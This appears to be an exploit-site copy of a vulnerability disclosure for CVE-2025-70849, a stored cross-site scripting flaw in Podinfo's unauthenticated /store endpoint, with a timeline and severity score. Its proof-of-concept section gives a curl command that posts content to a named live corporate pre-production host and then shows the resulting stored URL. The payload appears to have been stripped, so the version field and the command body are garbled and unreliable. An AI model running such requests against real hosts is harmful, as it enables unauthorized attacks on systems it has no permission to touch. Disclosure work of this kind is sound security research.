Share
## https://sploitus.com/exploit?id=1245A3D2-4DCF-56D2-9C61-BF86F8E89D7F
# CVE-2025-70849: Stored XSS in Podinfo

## Summary
A security vulnerability (CWE-79) was identified in **Podinfo**, a web application for demonstrating Kubernetes microservices. The `/store` feature allows unauthenticated users to upload arbitrary HTML/JS content, leading to Stored XSS.

## Vulnerability Details
- **CVE ID:** CVE-2025-70849
- **Product:** Podinfo
- **Affected Endpoint:** `/store`
- **Vulnerability Type:** Stored Cross-Site Scripting (XSS)
- **Affected Versions:** `CVE-2025-70849'
   ```
   example with live target:
   ```bash
   curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d 'CVE-2025-70849'
   ```
2. Access the returned hash: https:///store/

   example: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

## Timeline
- **Discovery:** Sep 2025
- **Vendor Notified:** 25 OCT 2025
- **Vendor Response:** Acknowledged; stated no current timeline for fix.
- **Public Disclosure:** February 2026

Disclaimer
This research is for educational purposes only.
---

## THANKS TO : 
[Kazi Sabbir](https://github.com/kazisabu/CVE-2025-70849-Podinfo/tree/main) | 
## Severity: Medium 6.4